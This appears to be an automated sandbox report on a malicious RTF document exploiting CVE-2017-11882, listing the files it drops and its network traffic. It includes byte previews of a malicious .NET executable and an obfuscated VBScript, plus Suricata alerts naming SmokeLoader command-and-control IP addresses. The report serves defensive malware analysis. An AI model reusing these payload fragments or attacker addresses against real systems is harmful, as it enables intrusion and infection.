                                                    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                    Malicious:false
                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\2q5zle4o.la4.psm1

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Preview:1

                                                    C:\Users\user\AppData\Local\Temp\D894.tmp

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 3, database pages 20, cookie 0x15, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.7798653713156546
                                                    Encrypted:false
                                                    SSDEEP:48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
                                                    MD5:CD5ACB5FAA79EEB4CDB481C6939EEC15
                                                    SHA1:527F3091889C553B87B6BC0180E903E2931CCCFE
                                                    SHA-256:D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
                                                    SHA-512:A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\E14C.tmp

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3008001, file counter 24, database pages 5, cookie 0xf, schema 4, UTF-8, version-valid-for 24
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):1.3870145383915669
                                                    Encrypted:false
                                                    SSDEEP:48:TBLOpEO5J/Kd7UEvqckQaKgj5EZwx1wayEgd7kKK9LeYyBlIAO/tXK:hNw0CKaKfu1wai6LeYzN/9K
                                                    MD5:1623709C6B2FB813984B1265C26A85F1
                                                    SHA1:CCE4DDBE93E97E68359CB6FD71242F796A785F86
                                                    SHA-256:88BCF762A75F085ECD3B12EB2BA81B81A7F8C9CDDDD4DED624BA28566EB7EEAA
                                                    SHA-512:6D2E23E4E0D1D912AF3426129F7DE490F23326F6179EEC27AFE28C438CA37493AEA775E62755C76D6A8850DB6D6E70F0D0A8D396A35E869F4BF0F761CDD507D8
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .........................................................................-........#..k...#.<....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\E2E3.tmp

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                                    Category:dropped
                                                    Size (bytes):77824
                                                    Entropy (8bit):1.133993246026424
                                                    Encrypted:false
                                                    SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                                    MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                                    SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                                    SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                                    SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\a0du0j0l.jnw.psm1

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Preview:1

                                                    C:\Users\user\AppData\Local\Temp\vbm1w30w.xtu.ps1

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Preview:1

                                                    C:\Users\user\AppData\Local\Temp\zoonpc2e.0er.ps1

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Preview:1

                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.LNK

                                                    Download File
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:05 2023, mtime=Fri Aug 11 15:42:05 2023, atime=Wed Jul 31 16:24:56 2024, length=102469, window=hide
                                                    Category:dropped
                                                    Size (bytes):1234
                                                    Entropy (8bit):4.552674071316221
                                                    Encrypted:false
                                                    SSDEEP:24:8G/XTotxOKIJ5HCdOlfem38PRHCdOlkDv3q057u:8G/XTsK5HCcfNCHCcL09u
                                                    MD5:5506960FB71F4F863AB7A86C68F000AC
                                                    SHA1:5BC5D11542BF7BA4B72103F80105CB7C4144C009
                                                    SHA-256:9E0DFE04F9775AE5DB503ABB05474ED1A0D2F11ED27898B70462E17A121E9C80
                                                    SHA-512:415B26088B7DDAC791D91A668AFA89A38123AC074B861C892588F22C50B57CE90436BFA71AE5D5A54B4CFB83A3648ACF84B783B9D9E4D6B582598A7D210806CF
                                                    Malicious:false
                                                    Preview:L..................F.... ....&(.r....&(.r...@.1.....E.......................'....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Y....user.8......QK.X.Y..*...&=....U...............A.l.b.u.s.....z.1......WD...Desktop.d......QK.X.WD.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.E....Y.. .SECURI~1.RTF..........WC..WC.*.........................S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...C.V.E.-.2.0.1.7.-.1.1.8.8.2...1.2.3...1.2.8.6.9...5.4.0.5...r.t.f.......................-...8...[............?J......C:\Users\..#...................\\045012\Users.user\Desktop\SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.rtf.Q.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...C.V.E.-.2.0.1.7.-.1.1.8.8.2...1.2.3...1.2.8.6.9...5.4.0.5...r.t.f.........:..,.LB.)...Ag...............1SP

                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                    Download File
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:Generic INItialization configuration [folders]
                                                    Category:dropped
                                                    Size (bytes):143
                                                    Entropy (8bit):5.0406982196266314
                                                    Encrypted:false
                                                    SSDEEP:3:H9rbcK+JiMUX2Alm4P8bcK+JiMUX2Alv:H9rwKNVX2AKwKNVX2A1
                                                    MD5:9CD4B2670BA206D46D78C25542C1E6A2
                                                    SHA1:A04B53F292AD58867B54CCCDC65ED4891B0553D1
                                                    SHA-256:0E02614289B47A8B940D5E5B9E6EE37A9C047DE9670D9AE6EF83B5BE72F030A5
                                                    SHA-512:5EBDCE4CC50345E0EFC5425549312444048E2092EFFEA162CA6D86F18D6B77A11746A7B2A737A85D81FA524807494440271C33070758D88971440F92224D7EFA
                                                    Malicious:false
                                                    Preview:[misc]..SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.LNK=0..[folders]..SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.LNK=0..

                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                    Download File
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):162
                                                    Entropy (8bit):2.4797606462020307
                                                    Encrypted:false
                                                    SSDEEP:3:vrJlaCkWtVyxblgl0nGltlMWtVGXlcNOllln:vdsCkWtMe2G/LkXh/l
                                                    MD5:89AFCB26CA4D4A770472A95DF4A52BA8
                                                    SHA1:C3B3FEAEF38C3071AC81BC6A32242E6C39BEE9B5
                                                    SHA-256:EF0F4A287E5375B5BFFAE39536E50FDAE97CD185C0F7892C7D25BD733E7D2F17
                                                    SHA-512:EA44D55E57AEFA8D6F586F144CB982145384F681D0391C5AD8E616A67D77913152DB7B0F927E57CDA3D1ECEC3D343A1D6E060EAFF8E8FEDBE38394DFED8224CC
                                                    Malicious:false
                                                    Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                    C:\Users\user\AppData\Roaming\gwseuha

                                                    Download File
                                                    Process:C:\Windows\explorer.exe
                                                    File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):64704
                                                    Entropy (8bit):6.02370063609959
                                                    Encrypted:false
                                                    SSDEEP:768:f8XcJiMjm2ieHlPyCsSuJbn8dBhFRHSMM6Iq8HSYDKJENf+i6CBpTX:TYMaNylPYSAb8dBnhHr4DKKNf+GBp
                                                    MD5:8FE9545E9F72E460723F484C304314AD
                                                    SHA1:3718A40FFC3AF2613B8B5FE41C475D85FF0522F4
                                                    SHA-256:D2F0B87E2D2707685C4D35F8F05B42FB8326EF4E70D16097B8837DABA06AC961
                                                    SHA-512:0738526EB2E6C485528C6B5A8DDABB51F095C134E010F9F3F25F341ABBE7A63072B0E2C2B161713D28B93F2A33C1476A0FED2D64FF86C9547DA9AF34DC90529A
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                    Joe Sandbox View:
                                                    • Filename: 40830001.xls, Detection: malicious, Browse
                                                    • Filename: capcut Setup-x64.msi, Detection: malicious, Browse
                                                    • Filename: 7YZlAbfKMg.rtf, Detection: malicious, Browse
                                                    • Filename: Product Inquiry466789.xls, Detection: malicious, Browse
                                                    • Filename: A24-00342B139336 #TW_Inquiry.xls, Detection: malicious, Browse
                                                    • Filename: LgTFM1JlJu.rtf, Detection: malicious, Browse
                                                    • Filename: #20240627_Edlen_B.xls, Detection: malicious, Browse
                                                    • Filename: #20240627_Edlen_A.xls, Detection: malicious, Browse
                                                    • Filename: Requirements.xla.xlsx, Detection: malicious, Browse
                                                    • Filename: vns.exe, Detection: malicious, Browse
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...pn.\..............0.............^.... ........@.. ....................... ............`.....................................O.......8................>........................................................... ............... ..H............text...d.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................@.......H........A...p..........T................................................~P...-.r...p.....(....(....s.....P...*..0.."........(......-.r...p.rI..p(....s....z.*...0..........(....~P.....o......*..(....*n(.....(..........%...(....*~(.....(..........%...%...(....*.(.....(..........%...%...%...(....*V.(......}Q.....}R...*..{Q...*..{R...*...0...........(.......i.=...}S......i.@...}T......i.@...}U.....+m...(....o .....r]..p.o!...,..{T.......{U........o"....+(.ra..p.o!...,..{T.......

                                                    C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs

                                                    Download File
                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):183084
                                                    Entropy (8bit):3.886576284833851
                                                    Encrypted:false
                                                    SSDEEP:3072:bYFoL2rQi6toiBDgt5p0Gwo9QjS7/DVRq9f1y9uuYaROM5e:0uqrh6BGqykae
                                                    MD5:5AC26F4D93962796DB9CD2E19B32B200
                                                    SHA1:9856C349AD2B408CDD23AA63A620F22FBDA87FA3
                                                    SHA-256:E3E7A3D0BA55B8DBBE3633B1DAD0A3BBF4EADA72DD8DF3F7B1BC76A692862F23
                                                    SHA-512:4C806A0A8FBA3FA9B24A0631D5A3E12F87E21AB3E45F44ECA8DE8C756F436B56E14D383A8B871BD5B5781624AC10E55F2FAD92DE02FA98E6FA53F57D6864B00A
                                                    Malicious:true
                                                    Preview:......a.O.L.h.K.f.L.q.J.U. .=. .".Z.n.f.L.W.m.C.c.G.n.".....U.z.p.u.L.N.N.f.K.k. .=. .".O.e.h.A.Q.W.U.x.L.L.".....L.c.g.O.G.K.m.K.c.L. .=. .".H.b.L.k.L.t.L.W.c.Q.".....v.c.U.s.f.l.Z.R.l.C. .=. .".m.L.u.b.S.T.k.K.W.h.".....k.O.G.G.J.A.l.U.e.f. .=. .".Z.R.f.K.z.W.L.Z.J.b.".....U.z.G.O.h.b.i.W.W.U. .=. .".Z.h.i.K.J.L.G.c.x.L.".....R.N.W.W.P.c.W.L.p.k. .=. .".i.n.L.c.R.a.L.O.R.T.".........L.J.R.H.p.W.O.L.i.A. .=. .".H.A.N.i.C.K.K.a.o.W.".....L.l.i.x.u.b.W.i.P.a. .=. .".e.C.P.x.b.Z.k.A.Q.c.".....c.a.W.i.l.m.i.U.Z.o. .=. .".P.O.b.f.c.P.W.t.m.W.".....p.b.n.Q.m.p.o.i.K.u. .=. .".Q.k.Z.A.v.l.I.x.c.J.".....P.q.i.G.N.O.k.W.u.S. .=. .".u.N.U.K.c.i.G.p.d.h.".....U.g.n.I.L.e.z.U.i.t. .=. .".I.W.G.c.L.u.h.W.H.k.".....o.a.k.C.e.o.A.L.z.i. .=. .".P.W.Z.Z.K.m.A.O.l.f.".....C.N.i.P.K.n.o.h.s.e. .=. .".N.G.U.q.L.d.i.z.G.W.".....P.c.K.P.T.W.k.e.Q.L. .=. .".s.h.N.H.b.z.k.W.T.W.".....L.N.G.L.t.A.H.i.d.G. .=. .".k.h.U.h.J.A.i.Z.P.W.".........P.c.Z.W.h.a.U.a.Q.s. .=. .".c.c.v.G.G.k.H.G.T.f.".....z.z.k.P.x.L.K.

                                                    C:\Users\user\AppData\Roaming\vhwiwts

                                                    Download File
                                                    Process:C:\Windows\explorer.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):339146
                                                    Entropy (8bit):7.999485892516095
                                                    Encrypted:true
                                                    SSDEEP:6144:vTRiNxMS/8R+glFU+3aJonkHLGpwQLaWUZGUX985IFUDH9cxdy+:v1iANyokHLGiQLaDQSUL9x+
                                                    MD5:9DEF0A335F47C66868E4F0164B04679E
                                                    SHA1:4D312D7C6C9E54E3BE7A50B84B0CBB25F38EF008
                                                    SHA-256:6AA186F54BDABAFFE99FD6503E45B1E7DDD74BA238C20BA94E81B913F54F6FE7
                                                    SHA-512:BAE2E5A628CD14D6B5BE595CAC5006FC6605B0199065EB5578C9DD2AF2FCD03FF51BBC4A54EFEB33B240AAD214FD0172C9A6FE6959DF7654C1EF3DDC466F84ED
                                                    Malicious:false
                                                    Preview:.p....f..l..k..;..>u%....(O*.H.m...........U....(..oZ.."V.+..W..=.,H.{...We......L.b.5.....<......]...c.ab.%:..zp .W..gX=i..B....5...:..s.(...x.A+m.K:.K...}...Z...'.\...*...y....&.O..@.B...v..R6.5^....t.n...d..Ul..V.....].0....2K.;.p(..@.d.. 43T.r..+.W../.S.4.e].'l.O.9I..8M.HO?.x}..".oG...E.o>ht.n..3.........e...6....a....$"....].rh}C...l..=E..'.!z%8..N.....Bc.. T.........{P~?....X..a.j"L......6.(.f`)A.c.(.....*[e.c...W....`...#....Z.@..y...7...Ox.......2.{hc.:7..#+(....GoZ.x..K..8...d.....GEK.q.2...S..~.*.E..7..8n.Mi.~=.pa.&.9v.......m..7e......{.j.Y.p....h.....3.mA..X....E.k8.Qf.H..S.#:A._...RI..M3.\...q.r2+.^.0%.dOo.v.?..r-1...*t............*..r....E..........2.a..#..m.O.G...,..KA.n.".68..d.......... E(.............{.x....D.>..q......0.j~.....<c...r}...U...O...;.....r..E..z..A.....I<......n..HB........$..eA..d(}.Q..J...K......~.XnT8..Ix.(..C...>....n.w.G|.p.t..oUZou.Q...\./.c.......f.[..\...-`...g...H.y..zTi.s.A..&.n..-L..."+6.

                                                    C:\Users\user\Desktop\~$curiteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.rtf

                                                    Download File
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):162
                                                    Entropy (8bit):2.4797606462020307
                                                    Encrypted:false
                                                    SSDEEP:3:vrJlaCkWtVyxblgl0nGltlMWtVGXlcNOllln:vdsCkWtMe2G/LkXh/l
                                                    MD5:89AFCB26CA4D4A770472A95DF4A52BA8
                                                    SHA1:C3B3FEAEF38C3071AC81BC6A32242E6C39BEE9B5
                                                    SHA-256:EF0F4A287E5375B5BFFAE39536E50FDAE97CD185C0F7892C7D25BD733E7D2F17
                                                    SHA-512:EA44D55E57AEFA8D6F586F144CB982145384F681D0391C5AD8E616A67D77913152DB7B0F927E57CDA3D1ECEC3D343A1D6E060EAFF8E8FEDBE38394DFED8224CC
                                                    Malicious:false
                                                    Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                    Static File Info

                                                    General

                                                    File type:Rich Text Format data, version 1
                                                    Entropy (8bit):2.582252060648168
                                                    TrID:
                                                    • Rich Text Format (5005/1) 55.56%
                                                    • Rich Text Format (4004/1) 44.44%
                                                    File name:SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.rtf
                                                    File size:102'469 bytes
                                                    MD5:1131d758c8208af277e943f04339e646
                                                    SHA1:030adac1abc31aa8bc3a22dda63c4a005aee6e88
                                                    SHA256:eb8381b156aad734ef3a0328b4985ed1edeca1c8d79d66e094598f8c6992ac71
                                                    SHA512:31952ff007778891c6fe0e34931233e396ee3649c8e502fe35808f2322afafeeb89d102c3eb364e0c3c3be1b84240a0375c58b4045a80ab2d838f0778dbbc5f0
                                                    SSDEEP:768:RnuaXplG+yhAWeLYLguPxUyxYxqY0WqhmRMw:RuTvhAWeLbuP6yiwY0WQmRMw
                                                    TLSH:96A3DF9DD74F00A5CF94A237421B4A8A49FCB73EF24110A578AC837437EDC2E49A59BC
                                                    File Content Preview:{\rtf1.............{\*\levelnumbers180579240 \%}.{\28554852%;*6,[<?|*;@9?(?(80?.!$'@.@|*??=~-1?3371*7!<_.4#-,9(?.)..~_##;3?+.7,(~+<<?))!).1>#__5..<:.9'^~2=058%]:@4|+31).^;??.8%==9[+_8*1$^%-%7]@?-**5;+&($~?=%,<579;?`]@13>3;(6:$1)`2*?6@|<![972+!:1`?2<+4/~4;

                                                    File Icon

                                                    Icon Hash:2764a3aaaeb7bdbf

                                                    Static RTF Info

                                                    Objects

                                                    IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                    000001483hno

                                                    Network Behavior

                                                    Suricata IDS Alerts

                                                    TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                                    2024-08-31T19:25:33.084582+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14916680192.168.2.22185.251.91.119
                                                    2024-08-31T19:26:53.834308+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14916880192.168.2.22185.251.91.119
                                                    2024-08-31T19:25:41.127631+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14916780192.168.2.22185.251.91.119
                                                    2024-08-31T19:25:33.477519+0200TCP2829848ETPRO MALWARE SmokeLoader encrypted module (3)28049166185.251.91.119192.168.2.22
                                                    2024-08-31T19:25:08.839977+0200TCP2049038ET MALWARE Malicious Base64 Encoded Payload In Image144349164207.241.232.154192.168.2.22

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Aug 31, 2024 19:25:01.480722904 CEST4916380192.168.2.2223.94.148.16
                                                    Aug 31, 2024 19:25:01.742561102 CEST804916323.94.148.16192.168.2.22
                                                    Aug 31, 2024 19:25:01.742644072 CEST4916380192.168.2.2223.94.148.16
                                                    Aug 31, 2024 19:25:01.742921114 CEST4916380192.168.2.2223.94.148.16
                                                    Aug 31, 2024 19:25:01.750555038 CEST804916323.94.148.16192.168.2.22
                                                    Aug 31, 2024 19:25:02.423346996 CEST804916323.94.148.16192.168.2.22
                                                    Aug 31, 2024 19:25:02.423366070 CEST804916323.94.148.16192.168.2.22
                                                    Aug 31, 2024 19:25:02.423372984 CEST804916323.94.148.16192.168.2.22
                                                    Aug 31, 2024 19:25:02.423506975 CEST4916380192.168.2.2223.94.148.16
                                                    Aug 31, 2024 19:25:02.423536062 CEST804916323.94.148.16192.168.2.22
                                                    Aug 31, 2024 19:25:02.423567057 CEST804916323.94.148.16192.168.2.22
                                                    Aug 31, 2024 19:25:02.423577070 CEST804916323.94.148.16192.168.2.22
                                                    Aug 31, 2024 19:25:02.423588991 CEST804916323.94.148.16192.168.2.22
                                                    Aug 31, 2024 19:25:02.423602104 CEST804916323.94.148.16192.168.2.22
                                                    Aug 31, 2024 19:25:02.423602104 CEST4916380192.168.2.2223.94.148.16
                                                    Aug 31, 2024 19:25:02.423624039 CEST4916380192.168.2.2223.94.148.16
                                                    Aug 31, 2024 19:25:02.423636913 CEST4916380192.168.2.2223.94.148.16
                                                    Aug 31, 2024 19:25:02.423787117 CEST804916323.94.148.16192.168.2.22
                                                    Aug 31, 2024 19:25:02.423799038 CEST804916323.94.148.16192.168.2.22
                                                    Aug 31, 2024 19:25:02.423847914 CEST4916380192.168.2.2223.94.148.16
                                                    Aug 31, 2024 19:25:02.423871040 CEST804916323.94.148.16192.168.2.22
                                                    Aug 31, 2024 19:25:02.423913956 CEST4916380192.168.2.2223.94.148.16
                                                    Aug 31, 2024 19:25:02.427826881 CEST4916380192.168.2.2223.94.148.16
                                                    Aug 31, 2024 19:25:02.428734064 CEST804916323.94.148.16192.168.2.22
                                                    Aug 31, 2024 19:25:02.428792953 CEST4916380192.168.2.2223.94.148.16
                                                    Aug 31, 2024 19:25:02.428796053 CEST804916323.94.148.16192.168.2.22
                                                    Aug 31, 2024 19:25:02.428806067 CEST804916323.94.148.16192.168.2.22
                                                    Aug 31, 2024 19:25:02.428833961 CEST4916380192.168.2.2223.94.148.16
                                                    Aug 31, 2024 19:25:02.428915977 CEST804916323.94.148.16192.168.2.22
                                                    Aug 31, 2024 19:25:02.428961039 CEST4916380192.168.2.2223.94.148.16
                                                    Aug 31, 2024 19:25:02.433593988 CEST804916323.94.148.16192.168.2.22
                                                    Aug 31, 2024 19:25:02.433625937 CEST804916323.94.148.16192.168.2.22
                                                    Aug 31, 2024 19:25:02.433660984 CEST804916323.94.148.16192.168.2.22
                                                    Aug 31, 2024 19:25:02.433672905 CEST4916380192.168.2.2223.94.148.16
                                                    Aug 31, 2024 19:25:02.433698893 CEST4916380192.168.2.2223.94.148.16
                                                    Aug 31, 2024 19:25:02.433706045 CEST804916323.94.148.16192.168.2.22
                                                    Aug 31, 2024 19:25:02.433743954 CEST4916380192.168.2.2223.94.148.16
                                                    Aug 31, 2024 19:25:02.438349962 CEST804916323.94.148.16192.168.2.22
                                                    Aug 31, 2024 19:25:02.438360929 CEST804916323.94.148.16192.168.2.22
                                                    Aug 31, 2024 19:25:02.438395023 CEST4916380192.168.2.2223.94.148.16
                                                    Aug 31, 2024 19:25:02.438395023 CEST4916380192.168.2.2223.94.148.16
                                                    Aug 31, 2024 19:25:02.438575029 CEST804916323.94.148.16192.168.2.22
                                                    Aug 31, 2024 19:25:02.438585043 CEST804916323.94.148.16192.168.2.22
                                                    Aug 31, 2024 19:25:02.438607931 CEST4916380192.168.2.2223.94.148.16
                                                    Aug 31, 2024 19:25:02.438627005 CEST4916380192.168.2.2223.94.148.16
                                                    Aug 31, 2024 19:25:02.443228006 CEST804916323.94.148.16192.168.2.22
                                                    Aug 31, 2024 19:25:02.443239927 CEST804916323.94.148.16192.168.2.22
                                                    Aug 31, 2024 19:25:02.443248034 CEST804916323.94.148.16192.168.2.22
                                                    Aug 31, 2024 19:25:02.443284035 CEST4916380192.168.2.2223.94.148.16
                                                    Aug 31, 2024 19:25:02.443294048 CEST4916380192.168.2.2223.94.148.16
                                                    Aug 31, 2024 19:25:02.443425894 CEST804916323.94.148.16192.168.2.22
                                                    Aug 31, 2024 19:25:02.443435907 CEST804916323.94.148.16192.168.2.22
                                                    Aug 31, 2024 19:25:02.443474054 CEST4916380192.168.2.2223.94.148.16
                                                    Aug 31, 2024 19:25:02.447959900 CEST804916323.94.148.16192.168.2.22
                                                    Aug 31, 2024 19:25:02.447988033 CEST804916323.94.148.16192.168.2.22
                                                    Aug 31, 2024 19:25:02.448030949 CEST4916380192.168.2.2223.94.148.16
                                                    Aug 31, 2024 19:25:02.448230028 CEST804916323.94.148.16192.168.2.22
                                                    Aug 31, 2024 19:25:02.448240995 CEST804916323.94.148.16192.168.2.22
                                                    Aug 31, 2024 19:25:02.448280096 CEST4916380192.168.2.2223.94.148.16
                                                    Aug 31, 2024 19:25:02.453038931 CEST804916323.94.148.16192.168.2.22
                                                    Aug 31, 2024 19:25:02.453048944 CEST804916323.94.148.16192.168.2.22
                                                    Aug 31, 2024 19:25:02.453057051 CEST804916323.94.148.16192.168.2.22
                                                    Aug 31, 2024 19:25:02.453068018 CEST804916323.94.148.16192.168.2.22
                                                    Aug 31, 2024 19:25:02.453077078 CEST804916323.94.148.16192.168.2.22
                                                    Aug 31, 2024 19:25:02.453080893 CEST4916380192.168.2.2223.94.148.16
                                                    Aug 31, 2024 19:25:02.453100920 CEST4916380192.168.2.2223.94.148.16
                                                    Aug 31, 2024 19:25:02.453109026 CEST4916380192.168.2.2223.94.148.16
                                                    Aug 31, 2024 19:25:02.457967043 CEST804916323.94.148.16192.168.2.22
                                                    Aug 31, 2024 19:25:02.457993031 CEST804916323.94.148.16192.168.2.22
                                                    Aug 31, 2024 19:25:02.458002090 CEST804916323.94.148.16192.168.2.22
                                                    Aug 31, 2024 19:25:02.458010912 CEST804916323.94.148.16192.168.2.22
                                                    Aug 31, 2024 19:25:02.458064079 CEST4916380192.168.2.2223.94.148.16
                                                    Aug 31, 2024 19:25:02.458316088 CEST4916380192.168.2.2223.94.148.16
                                                    Aug 31, 2024 19:25:02.463397026 CEST804916323.94.148.16192.168.2.22
                                                    Aug 31, 2024 19:25:02.463406086 CEST804916323.94.148.16192.168.2.22
                                                    Aug 31, 2024 19:25:02.463416100 CEST804916323.94.148.16192.168.2.22
